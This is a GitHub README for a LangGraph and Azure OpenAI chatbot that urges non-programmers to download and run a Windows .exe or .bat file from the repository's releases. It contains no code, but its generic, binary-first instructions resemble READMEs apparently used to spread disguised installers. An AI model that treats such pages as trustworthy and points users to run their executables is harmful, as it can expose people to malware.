Skip to content

Gfake-tech/python-langgraph-chatbot

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

5 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

🤖 python-langgraph-chatbot - Simple AI Chatbot for Learning

Download from Releases


📚 About python-langgraph-chatbot

This is an easy-to-use chatbot built with LangGraph, Azure OpenAI, and Gradio. It lets you ask questions and get helpful answers through a simple web interface. The chatbot works well with PDF documents and supports conversations related to AI agents and Python skills. It aims to provide an educational experience without needing programming knowledge.

The app runs on Windows and uses modern Python tools behind the scenes. You will interact with it like a normal web page, but it runs locally on your computer for privacy and speed.


🚀 Getting Started

This guide will help you download and run the chatbot on your Windows PC. You do not need to know programming or install any complex software.

System Requirements

  • Windows 10 or later (64-bit recommended)
  • At least 4 GB of RAM
  • Internet connection (required for Azure OpenAI services)
  • 500 MB of free disk space for installation and data
  • Modern web browser like Chrome, Edge, or Firefox

🌐 Download the Application

Start by visiting the release page to get the software. This is the official place where new versions are published.

Download Application

To download the app:

  1. Click the link above or go to this URL in your browser: https://github.com/Gfake-tech/python-langgraph-chatbot/releases
  2. Look for the latest version in the list. The newest release is at the top.
  3. Find the Windows installer or zip file. The file usually ends with .exe for easy installation or .zip if you want the portable version.
  4. Click the file name to download it. Your browser will save it to your Downloads folder or the location you chose.

💻 Installing and Running the Chatbot

Using the Installer (.exe)

If you downloaded an .exe file:

  1. Find the downloaded file in your Downloads folder.
  2. Double-click the file to start the installer.
  3. Follow the instructions on screen. You can choose the default settings.
  4. Wait for the installation to complete.
  5. Once done, look for the "python-langgraph-chatbot" icon on your desktop or Start menu.
  6. Click the icon to launch the app.

Using the Zip File (.zip)

If you downloaded a .zip file:

  1. Find the .zip file in your Downloads folder.
  2. Right-click it and choose "Extract All..."
  3. Select a destination folder where you want to save the files.
  4. After extraction, open the folder with the new files.
  5. Double-click start-chatbot.bat or the executable file named similarly to run the chatbot.

🌟 Using the Chatbot

Once the chatbot is running, your web browser will open to a simple page.

  • You type your questions in the box.
  • Press Enter or click Send.
  • The chatbot responds below instantly.
  • You can upload PDF documents to ask specific questions about them.
  • The bot remembers your conversation during your session.

The interface is clean and easy to use. It does not require commands or special knowledge. Just type naturally.


🔧 Troubleshooting

If something does not work:

  • Make sure your internet connection is active.
  • Check that you have the latest version installed.
  • Restart the app by closing and opening it again.
  • Close other applications that might slow down your PC.
  • If the browser does not open automatically, try opening this address manually: http://localhost:7860

⚙ Features Included

  • Chat with an AI powered by LangGraph and Azure OpenAI
  • Support for PDF document uploads and Q&A
  • Clean and simple web interface via Gradio
  • Runs locally on Windows with no programming needed
  • Handles conversations on AI agents and Python topics
  • Easy installation with a friendly setup process

🔗 Useful Links


🛠 Frequently Asked Questions

Q: Do I need Python installed?
No. The app comes bundled with everything it needs to run.

Q: Is my data shared?
Your questions are sent to Azure OpenAI servers for answers, but no personal data is stored by the app.

Q: Can I use the chatbot offline?
No. It requires internet access to connect to the AI services.

Q: How do I update the app?
Download the latest version from the releases page and install it over your current version.


Download from Releases